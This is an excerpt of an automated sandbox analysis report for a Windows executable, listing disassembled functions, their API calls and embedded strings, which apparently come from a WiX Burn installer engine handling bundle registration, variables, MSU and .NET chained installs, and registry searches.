Instruction Fuzzy Hash: 8DC1B176D4562ABBCF219A98CD05E6DBF75BB04720F244267F902B7290D770EE00E7A0

Function 0059FF99 Relevance: 84.5, APIs: 1, Strings: 47, Instructions: 484registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 005A0592

Strings

3.11.1.2318, xrefs: 005A0193
DisplayIcon, xrefs: 005A01BB, 005A01C5
BundleVersion, xrefs: 005A00CF, 005A00F5
VersionMajor, xrefs: 005A010F, 005A0115
%s,0, xrefs: 005A01C0
HelpLink, xrefs: 005A025A, 005A026D
Failed to update name and publisher., xrefs: 005A01EE
URLInfoAbout, xrefs: 005A02A6, 005A02B9
Failed to cache bundle from path: %ls, xrefs: 0059FFEF
Comments, xrefs: 005A033A, 005A034D
BundlePatchCode, xrefs: 005A00B1, 005A00B9
QuietUninstallString, xrefs: 005A044D, 005A0463
BundleTag, xrefs: 005A017B, 005A0180
BundleProviderKey, xrefs: 005A015A, 005A015F
BundleAddonCode, xrefs: 005A0075, 005A007D
Publisher, xrefs: 005A0234, 005A0247
"%ls" %ls, xrefs: 005A0484
NoElevateOnModify, xrefs: 005A03D7, 005A03EA
/modify, xrefs: 005A0474
Failed to write update registration., xrefs: 005A04E5
BundleCachePath, xrefs: 005A003C, 005A0041
UninstallString, xrefs: 005A0489, 005A049F
DisplayVersion, xrefs: 005A0201, 005A0214
NoRemove, xrefs: 005A0403, 005A0416
Failed to create registration key., xrefs: 005A001C
ParentKeyName, xrefs: 005A0312, 005A0325
Failed to write %ls value., xrefs: 005A0531
BundleDetectCode, xrefs: 005A0093, 005A009B
%hu.%hu.%hu.%hu, xrefs: 005A00F0
EngineVersion, xrefs: 005A019D, 005A01A2
Failed to register the bundle dependency key., xrefs: 005A0553
"%ls" /modify, xrefs: 005A03B0
URLUpdateInfo, xrefs: 005A02CC, 005A02DF
/uninstall, xrefs: 005A047B, 005A0480
HelpTelephone, xrefs: 005A0280, 005A0293
SystemComponent, xrefs: 005A0428, 005A043B
Failed to update resume mode., xrefs: 005A056D
NoModify, xrefs: 005A038B, 005A039E
ModifyPath, xrefs: 005A03B5, 005A03CB
%hs, xrefs: 005A0198
Failed to write software tags., xrefs: 005A04C5
EstimatedSize, xrefs: 005A051C, 005A0521, 005A0530
Contact, xrefs: 005A0362, 005A0375
ParentDisplayName, xrefs: 005A02F2, 005A0305
"%ls" /uninstall /quiet, xrefs: 005A0448
VersionMinor, xrefs: 005A0138, 005A013E
BundleUpgradeCode, xrefs: 005A0057, 005A005F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Close
String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$userVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
API String ID: 3535843008-2755343042
Opcode ID: 3150127b89a67048641ec89f2067ad405c1e5a6fd8f19301a851c22da3ef8341
Instruction ID: 527364711f455a4643028de36bac4a5df2ecff540a032847b3c40f46c291c2c4
Opcode Fuzzy Hash: 3150127b89a67048641ec89f2067ad405c1e5a6fd8f19301a851c22da3ef8341
Instruction Fuzzy Hash: F2F10331E50A66BBCF265664CD06FAD7EA5BF09710F042162F900762D1D7B1ED60EBC4

Function 00598476 Relevance: 61.6, APIs: 5, Strings: 30, Instructions: 331COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,80070490,?,?,?,?,?,?,?,ETY,005BC1BF,?,?,?), ref: 005984A7
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,ETY,005BC1BF,?,?,?,?,ETY,Chain), ref: 00598804

Strings

Type, xrefs: 005985A3
Invalid value for @Type: %ls, xrefs: 00598778
ETY, xrefs: 00598476
Failed to select variable nodes., xrefs: 005984C4
version, xrefs: 0059862C
variable.cpp, xrefs: 005987B9
Failed to change variant type., xrefs: 005987DA
Failed to get @Hidden., xrefs: 005987E8
Failed to get @Persisted., xrefs: 005987E1
Failed to get @Id., xrefs: 005987EF
Failed to find variable value '%ls'., xrefs: 005987D2
Hidden, xrefs: 0059852F
Failed to get @Type., xrefs: 00598788
numeric, xrefs: 005985BC
Failed to get @Value., xrefs: 00598796
string, xrefs: 005985F7
Variable, xrefs: 005984B1
Initializing numeric variable '%ls' to value '%ls', xrefs: 005985E2
Failed to get next node., xrefs: 005987F6
Failed to insert variable '%ls'., xrefs: 005986C6
Attempt to set built-in variable value: %ls, xrefs: 005987C8
Failed to set variant value., xrefs: 0059878F
Value, xrefs: 00598565
Initializing string variable '%ls' to value '%ls', xrefs: 0059861A
Persisted, xrefs: 0059854A
Failed to set variant encryption, xrefs: 0059879D
Initializing version variable '%ls' to value '%ls', xrefs: 00598653
Failed to get variable node count., xrefs: 005984E1
Initializing hidden variable '%ls', xrefs: 00598671
Failed to set value of variable: %ls, xrefs: 005987A7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Attempt to set built-in variable value: %ls$ETY$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
API String ID: 3168844106-2301316171
Opcode ID: 392b94c90912b289585636e1d9afcab1f75e40eb04ffa64b5696277d8eeb247f
Instruction ID: cb09e814e2ba0640f4821d4c8f0a810bab3796535cf22da47fba5e68da7cbfb4
Opcode Fuzzy Hash: 392b94c90912b289585636e1d9afcab1f75e40eb04ffa64b5696277d8eeb247f
Instruction Fuzzy Hash: 6BB18A32D4122ABBCF219B98CC46EAEBF75FF45710F200657F914BA290DB719A40DB90

Function 005B6CCC Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 379COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,005ABDDC,00000007,?,?,?), ref: 005B6D20

Part of subcall function 005D0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00595EB2,00000000), ref: 005D0AE0
Part of subcall function 005D0ACC: GetProcAddress.KERNEL32(00000000), ref: 005D0AE7
Part of subcall function 005D0ACC: GetLastError.KERNEL32(?,?,?,00595EB2,00000000), ref: 005D0AFE

CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 005B710F
CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 005B7123

Strings

Failed to allocate WUSA.exe path., xrefs: 005B6DB3
Failed to append log switch to MSU command-line., xrefs: 005B6EB6
2, xrefs: 005B6FB3
"%ls" "%ls" /quiet /norestart, xrefs: 005B6E48
Failed to wait for executable to complete: %ls, xrefs: 005B709E
WixBundleExecutePackageCacheFolder, xrefs: 005B6E0B, 005B713B
Failed to get process exit code., xrefs: 005B702C
D, xrefs: 005B6F3B
Failed to determine WOW64 status., xrefs: 005B6D32
/log:, xrefs: 005B6EA2
msuuser.cpp, xrefs: 005B6F8D, 005B7022, 005B704A
Bootstrapper application aborted during MSU progress., xrefs: 005B7054
wusa.exe, xrefs: 005B6DA0
Failed to build MSU path., xrefs: 005B6E35
Failed to format MSU install command., xrefs: 005B6E5C
"%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 005B6E75
Failed to find System32 directory., xrefs: 005B6D95
Failed to append log path to MSU command-line., xrefs: 005B6ED4
Failed to format MSU uninstall command., xrefs: 005B6E89
Failed to append SysNative directory., xrefs: 005B6D7D
Failed to find Windows directory., xrefs: 005B6D5F
Failed to get action arguments for MSU package., xrefs: 005B6DD6
Failed to get cached path for package: %ls, xrefs: 005B6DFC
Failed to ensure WU service was enabled to install MSU package., xrefs: 005B6F2E
Failed to CreateProcess on path: %ls, xrefs: 005B6F9A
SysNative\, xrefs: 005B6D6A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuuser.cpp$wusa.exe
API String ID: 1400713077-4261965642
Opcode ID: ea1bd878669a06949232eec870acefdf0af831045f585873549609c62beabcf6
Instruction ID: 512531e1d47c4d902a9c3b8d6f4b7aa40f9d8f241c8df081234bf34e381bc58b
Opcode Fuzzy Hash: ea1bd878669a06949232eec870acefdf0af831045f585873549609c62beabcf6
Instruction Fuzzy Hash: 65D17F71A4031EEFDF21AFE5CC89AEE7EB8BF58700F100426F640A6151D7B5AA44DB61

Function 005A54DC Relevance: 52.7, APIs: 17, Strings: 13, Instructions: 229filepipesleepCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,005DB500,?,00000000,?,0059452F,?,005DB500), ref: 005A54FD
GetCurrentProcessId.KERNEL32(?,0059452F,?,005DB500), ref: 005A5508
SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0059452F,?,005DB500), ref: 005A553F
ConnectNamedPipe.KERNEL32(?,00000000,?,0059452F,?,005DB500), ref: 005A5554
GetLastError.KERNEL32(?,0059452F,?,005DB500), ref: 005A555E
Sleep.KERNEL32(00000064,?,0059452F,?,005DB500), ref: 005A5593
SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0059452F,?,005DB500), ref: 005A55B6
WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0059452F,?,005DB500), ref: 005A55D1
WriteFile.KERNEL32(?,/EY,005DB500,00000000,00000000,?,0059452F,?,005DB500), ref: 005A55EC
WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,0059452F,?,005DB500), ref: 005A5607
ReadFile.KERNEL32(?,wininet.dll,00000004,feclient.dll,00000000,?,0059452F,?,005DB500), ref: 005A5622
GetLastError.KERNEL32(?,0059452F,?,005DB500), ref: 005A567D
GetLastError.KERNEL32(?,0059452F,?,005DB500), ref: 005A56B1
GetLastError.KERNEL32(?,0059452F,?,005DB500), ref: 005A56E5
GetLastError.KERNEL32(?,0059452F,?,005DB500), ref: 005A5719
GetLastError.KERNEL32(?,0059452F,?,005DB500), ref: 005A574A
GetLastError.KERNEL32(?,0059452F,?,005DB500), ref: 005A577B

Strings

Failed to reset pipe to blocking., xrefs: 005A5774
comres.dll, xrefs: 005A5605
Failed to write secret length to pipe., xrefs: 005A5743
feclient.dll, xrefs: 005A55FF, 005A561A
Failed to write our process id to pipe., xrefs: 005A56DB
Failed to set pipe to non-blocking., xrefs: 005A57A5
Failed to write secret to pipe., xrefs: 005A570F
/EY, xrefs: 005A55E8
Failed to read ACK from pipe., xrefs: 005A56A7
crypt32.dll, xrefs: 005A55CF
Failed to wait for child to connect to pipe., xrefs: 005A5673
wininet.dll, xrefs: 005A5620
pipe.cpp, xrefs: 005A5669, 005A569D, 005A56D1, 005A5705, 005A5739, 005A576A, 005A579B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: /EY$Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$comres.dll$crypt32.dll$feclient.dll$pipe.cpp$wininet.dll
API String ID: 2944378912-1202993557
Opcode ID: e781ccada6c2a35b57f955e88d789d2af9ad78ec822ff31ee6f2230f5a08b910
Instruction ID: 6e2757e54e82c30702021ea6d807274447d6a9dff7168653a2a2bbce10200e3e
Opcode Fuzzy Hash: e781ccada6c2a35b57f955e88d789d2af9ad78ec822ff31ee6f2230f5a08b910
Instruction Fuzzy Hash: D071C877D41736EBDB2096A58C49FAE6EA8BF15B50F124526FE00FB180F7749D008AE0

Function 005BD43E Relevance: 49.3, APIs: 12, Strings: 16, Instructions: 290synchronizationprocessCOMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 005BD4B3
StringFromGUID2.OLE32(?,?,00000027), ref: 005BD4DC
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 005BD5C5
GetLastError.KERNEL32(?,?,?,?), ref: 005BD5CF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 005BD668
WaitForSingleObject.KERNEL32(005DB500,000000FF,?,?,?,?), ref: 005BD673
ReleaseMutex.KERNEL32(005DB500,?,?,?,?), ref: 005BD69D
GetExitCodeProcess.KERNEL32(?,?), ref: 005BD6BE
GetLastError.KERNEL32(?,?,?,?), ref: 005BD6CC
GetLastError.KERNEL32(?,?,?,?), ref: 005BD704

Part of subcall function 005BD33E: WaitForSingleObject.KERNEL32(?,000000FF,762330B0,00000000,?,?,?,?,005BD642,?), ref: 005BD357
Part of subcall function 005BD33E: ReleaseMutex.KERNEL32(?,?,?,?,005BD642,?), ref: 005BD375
Part of subcall function 005BD33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 005BD3B6
Part of subcall function 005BD33E: ReleaseMutex.KERNEL32(?), ref: 005BD3CD
Part of subcall function 005BD33E: SetEvent.KERNEL32(?), ref: 005BD3D6

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 005BD7B9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 005BD7D1

Strings

Failed to allocate netfx chainer arguments., xrefs: 005BD593
Failed to create netfx chainer., xrefs: 005BD55E
NetFxSection.%ls, xrefs: 005BD509
D, xrefs: 005BD5AA
%ls /pipe %ls, xrefs: 005BD57F
D$[, xrefs: 005BD46D
Failed to create netfx chainer guid., xrefs: 005BD4C0
Failed to wait for netfx chainer process to complete, xrefs: 005BD732
Failed to get netfx return code., xrefs: 005BD6FA
Failed to allocate event name., xrefs: 005BD53F
NetFxChainer.cpp, xrefs: 005BD4F1, 005BD5F3, 005BD6F0, 005BD728
NetFxEvent.%ls, xrefs: 005BD52B
Failed to CreateProcess on path: %ls, xrefs: 005BD5FE
Failed to convert netfx chainer guid into string., xrefs: 005BD4FB
Failed to process netfx chainer message., xrefs: 005BD648
Failed to allocate section name., xrefs: 005BD51D

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
String ID: %ls /pipe %ls$D$D$[$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
API String ID: 1533322865-3457059470
Opcode ID: 637955a722ec10e17c76c7c4cb19aff3096f0e9b5d8a6deda015c5a57c4b4ec5
Instruction ID: 62d3b4e4569f3c864fa39e837c44d6f46e773b90feb0e90b0a6ce0491485e216
Opcode Fuzzy Hash: 637955a722ec10e17c76c7c4cb19aff3096f0e9b5d8a6deda015c5a57c4b4ec5
Instruction Fuzzy Hash: 3EA18F72D01229ABDF219FA4CC45BEEBFB4FB04710F154166EA08E7291E734AD449FA1

Function 005D744A Relevance: 47.6, APIs: 13, Strings: 14, Instructions: 340COMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 005D755D
SysFreeString.OLEAUT32(00000000), ref: 005D7726
SysFreeString.OLEAUT32(00000000), ref: 005D77C3

Strings

category, xrefs: 005D74B8, 005D7665
updated, xrefs: 005D7604
atomutil.cpp, xrefs: 005D7477, 005D77AD
@, xrefs: 005D76CC
subtitle, xrefs: 005D75CC
entry, xrefs: 005D74D5, 005D769E
logo, xrefs: 005D75B0
icon, xrefs: 005D7574
link, xrefs: 005D74F2, 005D76D4
author, xrefs: 005D749B, 005D762C
(, xrefs: 005D7701
generator, xrefs: 005D7550
title, xrefs: 005D75E8
`Dv, xrefs: 005D7726, 005D77C3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$FreeHeap$AllocateCompareProcess
String ID: ($@$`Dv$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
API String ID: 1555028553-177796383
Opcode ID: a3ebf83b8c1bea5e2605b06257d00a19613ea9b265f37ce8cacfbeea5c3efd1e
Instruction ID: 10264a6b98c5dc3c3c9d53d937843e600971aa01c7a70238dd4103e08822dbbb
Opcode Fuzzy Hash: a3ebf83b8c1bea5e2605b06257d00a19613ea9b265f37ce8cacfbeea5c3efd1e
Instruction Fuzzy Hash: 18B16F3594922ABBDB219BA8CC41F6E7E74FB08720F200757F521A63D1E770EA50DB91

Function 005D710D Relevance: 47.5, APIs: 11, Strings: 16, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,005F3E78,000000FF,?,?,?), ref: 005D71D4
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 005D71F9
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 005D7219
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 005D7235
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 005D725D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 005D7279
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 005D72B2
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 005D72EB

Part of subcall function 005D6D50: SysFreeString.OLEAUT32(00000000), ref: 005D6E89
Part of subcall function 005D6D50: SysFreeString.OLEAUT32(00000000), ref: 005D6EC8

SysFreeString.OLEAUT32(00000000), ref: 005D736F
SysFreeString.OLEAUT32(00000000), ref: 005D741F

Strings

msi.dll, xrefs: 005D7137
category, xrefs: 005D7155, 005D72A4
published, xrefs: 005D7227
updated, xrefs: 005D724F
atomutil.cpp, xrefs: 005D740C
feclient.dll, xrefs: 005D7206
link, xrefs: 005D7172, 005D731D
clbcatq.dll, xrefs: 005D7242
(, xrefs: 005D734A
author, xrefs: 005D7138, 005D726B
version.dll, xrefs: 005D7133
content, xrefs: 005D72DD
summary, xrefs: 005D71EB
title, xrefs: 005D720B
cabinet.dll, xrefs: 005D7150
`Dv, xrefs: 005D736F, 005D741F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$Compare$Free
String ID: ($`Dv$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
API String ID: 318886736-3891805788
Opcode ID: a7f9f7709d46eea74ba36481e7120f724db0af1fd4348e82c5d5227b9a2f9c67
Instruction ID: 77090c03a5fc2f77b58c9e9ce808538ff248fad44f70e70601cbf48e84bf5cea
Opcode Fuzzy Hash: a7f9f7709d46eea74ba36481e7120f724db0af1fd4348e82c5d5227b9a2f9c67
Instruction Fuzzy Hash: 89A1913194921ABBDB319A98CC45F6DBE74BB08730F204757F921A63D1E730EA40EB91

Function 0059A416 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0059A45A
_MREFOpen@16.MSPDB140-MSVCRT ref: 0059A480
RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0059A768

Strings

Failed to set variable., xrefs: 0059A72B
RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0059A740
Failed to format value string., xrefs: 0059A48B
Failed to open registry key., xrefs: 0059A4ED
Failed to allocate memory registry value., xrefs: 0059A587
Registry key not found. Key = '%ls', xrefs: 0059A4B4
Unsupported registry key value type. Type = '%u', xrefs: 0059A608
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0059A51C
Failed to format key string., xrefs: 0059A465
Failed to query registry key value., xrefs: 0059A5DA
Failed to read registry value., xrefs: 0059A6F6
Failed to allocate string buffer., xrefs: 0059A667
Failed to change value type., xrefs: 0059A70F
Failed to clear variable., xrefs: 0059A4D8
Failed to query registry key value size., xrefs: 0059A554
search.cpp, xrefs: 0059A54A, 0059A57D, 0059A5D0, 0059A6D3
Failed to get expand environment string., xrefs: 0059A6DD

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Open@16$Close
String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
API String ID: 2348241696-3124384294
Opcode ID: a61b64c8d996ce958bc7c9b4848aa78ced1c84672bd37b1b16207261509a8c35
Instruction ID: 236e282a36ce654820c728d2de793eac8b9967dc459ccdd96f24d2d139e4ea78
Opcode Fuzzy Hash: a61b64c8d996ce958bc7c9b4848aa78ced1c84672bd37b1b16207261509a8c35
Instruction Fuzzy Hash: 1DA1B772D41126BBDF21ABE8CC4AAAE7E79FF04710F158513F904BA251D7719D009BE2

Function 00595770 Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 479stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,0059A8B4,00000100,000002C0,000002C0,00000100), ref: 00595795
lstrlenW.KERNEL32(000002C0,?,0059A8B4,00000100,000002C0,000002C0,00000100), ref: 0059579F
_wcschr.LIBVCRUNTIME ref: 005959A7
LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,0059A8B4,00000100,000002C0,000002C0,00000100), ref: 00595C4A

Strings

Failed to format record., xrefs: 00595C0E
Failed to reallocate variable array., xrefs: 00595A2C
[%d], xrefs: 00595962
Failed to get formatted length., xrefs: 00595B92
Failed to set record format string., xrefs: 00595AD4
Failed to determine variable visibility: '%ls'., xrefs: 00595A3A
*****, xrefs: 00595913
Failed to get variable name., xrefs: 00595A8C
variable.cpp, xrefs: 005959FE, 00595A1F, 00595A78, 00595ACA, 00595B56, 00595B88, 00595C04
Failed to append string., xrefs: 0059581B
Failed to allocate record., xrefs: 00595A0B
Failed to append placeholder., xrefs: 00595A4D
Failed to allocate buffer for format string., xrefs: 005957BD
Failed to set variable value., xrefs: 00595A61
Failed to format placeholder string., xrefs: 00595A57
Failed to copy string., xrefs: 00595C2E
Failed to allocate string., xrefs: 00595BC1
Failed to set record string., xrefs: 00595B60
Failed to allocate variable array., xrefs: 00595A85

Memory Dump Source

